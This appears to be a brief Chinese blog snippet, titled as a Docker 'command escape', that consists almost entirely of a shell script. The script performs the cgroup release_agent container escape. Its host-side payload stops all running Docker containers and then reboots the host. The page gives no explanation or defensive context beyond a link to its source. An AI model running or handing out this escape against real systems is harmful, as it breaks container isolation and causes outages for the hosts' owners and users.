docker
docker 命令逃逸https://www.modb.pro/db/423145
mkdir -p /tmp/vigorous
mount -t cgroup -o memory cgroup /tmp/vigorous
cd /tmp/vigorous
mkdir /tmp/vigorous/x
echo "1" >/tmp/vigorous/x/notify_on_release
echo "/docker_commands/cmd" > /tmp/vigorous/release_agent
echo '#!/bin/sh' > /docker_commands/cmd
echo "docker stop \$(docker ps -aq)" >> /docker_commands/cmd
echo "reboot" >> /docker_commands/cmd
chmod a+x /docker_commands/cmd
sh -c "echo \$\$ > /tmp/vigorous/x/cgroup.procs"
一天一天的满足,即一天一天的堕落!

浙公网安备 33010602011771号